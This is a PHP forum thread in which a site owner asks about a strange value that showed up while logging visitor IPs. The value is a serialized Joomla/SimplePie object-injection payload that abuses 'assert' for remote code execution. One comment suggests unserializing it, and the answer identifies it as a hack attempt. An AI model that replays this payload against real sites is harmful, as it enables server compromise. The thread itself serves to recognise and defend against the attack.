# strange code appearing when i am trying to get user IP

Tags: php

I am getting IP of my site's visitors. Below is strange code i am getting for one of value:

> > =}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}
> >     s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";
> >     O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));
> >     JFactory::getConfig();exit";s:19:"cache_name_function";
> >     s:6:"assert";
> >     s:5:"cache";b:1;s:11:"cache_class";
> >     O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ğııı

What exact information is trying to get and is it some hacking attempt?

Comment: It's not strange, it's serialized.

Comment: maybe tell us what you do to get this "strange code"

Comment: Use unserialsize()

Comment: It is giving error when i am passing this value in unserialize PHP function.

Answer (score 1):

You've probably already resolved this, but this is a hack attempt (remote code execution).

If you happen to pass this through PHP's unserialize method there's a risk that the code will run as the user running your website.